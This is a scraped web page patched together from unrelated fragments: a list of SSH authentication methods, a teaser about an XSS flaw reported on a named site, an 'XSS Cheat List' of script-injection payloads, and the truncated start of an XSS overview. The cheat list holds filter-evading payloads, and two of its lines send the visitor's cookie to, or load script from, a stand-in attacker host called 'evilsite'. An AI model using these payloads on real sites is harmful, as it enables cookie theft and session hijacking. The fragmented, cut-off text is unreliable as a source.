The SSH-2 protocol supports the following user authentications:

* Public key authentication (DSA, RSA*, OpenPGP)
* Host-based authentication
* Password-based authentication

Note: SSH-1 supports a wider range of user authentications, i.e., the public-key, RSA only, RhostsRSA, password, Rhosts (rsh-style), TIS, and Kerberos authentications.

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Critical XSS vulnerability in YouthDreams.Net

Security Researcher $@T0R! reported another XSS vulnerability in http://www.youthdreams.net Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

XSS Injection Vulnerabilities

Cross Site Scripting Overview Cross Site Scripting vulnerabilities are sometimes referred to XSS or CSS vulnerabilities. Typically XSS is preferred over the use of CSS. CSS typically refers to the